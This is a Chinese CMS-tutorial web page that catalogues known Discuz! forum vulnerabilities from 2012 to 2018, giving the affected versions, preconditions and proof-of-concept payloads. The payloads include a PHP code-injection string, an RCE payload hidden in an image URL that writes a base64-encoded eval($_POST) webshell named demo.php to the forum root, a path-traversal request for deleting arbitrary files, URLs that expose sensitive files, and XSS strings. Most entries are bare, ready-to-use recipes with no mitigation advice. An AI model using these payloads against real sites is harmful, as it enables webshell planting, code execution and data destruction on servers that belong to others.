您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程

Discuz常见漏洞汇总

元柏2025-07-03Discuz教程已有人查阅

导读Discuz ML! V3.X 代码注入代码注入导致RCEDiscuz! X2.5 远程代码执行(1).注册任意账户(2).登陆用户,发表blog日志(注意是日志)(3).添加图片,选择网络图片

Discuz ML! V3.X 代码注入
Date
2019
类型
代码注入导致RCE
影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012
类型:
敏感信息泄露
影响范围:
DZ x2.5
POC:
http:// .xx.xx/uc_server/control/admin/db.php
http:// .xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http:// .xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
2012
类型:
RCE
前置条件:
(1).注册任意账户
(2).登陆用户,发表blog日志(注意是日志)
(3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).访问日志,论坛根目录下生成demo.php,一句发密码c
影响范围:
v2.5
Discuz!X2/2.5弱口令破解漏洞
Date:
2013
类型:
登录界面 破解
影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
2014
类型:
任意文件删除
前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10
类型:
前台任意文件删除
影响范围:
SSV-89024
Date:
2015.1
类型:
Discuz X2.5 /source/class/class_image.php 命令执行漏洞
影响范围:
Discuz X2.5
Discuz! X系列远程代码执行漏洞
Date:
2015.8
类型:
RCE + XML反序列化
前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3
类型:
SSRF
影响范围:
Discuz! X2 X3
POC:
http://www.ebingou.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8
类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析
Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script>
Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

本文标签:

很赞哦! ()

相关源码

  • (响应式自适应)小学初中作文论文文章资讯博客pbootcms模板下载为中小学作文、教育类网站设计,特别适合展示学生作文、教学资源和写作指导等内容。采用响应式技术,确保在不同设备上都能获得良好的阅读体验。查看源码
  • (自适应)家政保洁保姆打扫卫生清灰服务pbootcms模板免费下载采用手工编写的DIV+CSS架构,代码结构清晰无冗余,加载速度优异。响应式设计适配各类终端设备,保障手机、平板、电脑端的一致浏览体验。查看源码
  • pbootcms源码宠物类网站源码下载(自适应多端)为宠物装备商店、宠物食品及用品企业打造的营销型模板,基于PbootCMS内核深度开发。采用响应式设计实现PC与移动端适配,PHP7.0+高性能架构支持MySQL/SQLite双数据库查看源码
  • (自适应响应式)html5文章资讯新闻博客pbootcms网站模板下载本模板基于PbootCMS系统开发,为新闻资讯、博客类网站设计,特别适合各类文章内容的发布与管理。采用响应式技术,确保在不同设备上都能获得良好的阅读体验。查看源码
  • (PC+WAP)蓝色钢结构机械五金工程建筑基建营销型pbootcms模板下载于PbootCMS开发的钢结构与工程机械专用模板,助力企业构建专业级产品展示平台;模板内置工程案例展示、产品参数对照表等专业模块,预设项目进度、施工方案等建筑行业专属栏目查看源码
  • 帝国CMS7.5二次元COS漫展网站模板源码免费下载本模板基于帝国CMS 7.5版本深度开发,为二次元文化分享领域设计。采用UTF-8编码,支持中文内容展示,特别适用于COSPLAY作品展示、漫展信息发布等二次元相关内容的网站建设。模板结构清晰,布局合理,充分考虑了二次元用户群体的浏览习惯和审美需求。查看源码
分享笔记 (共有 篇笔记)
验证码:

本栏推荐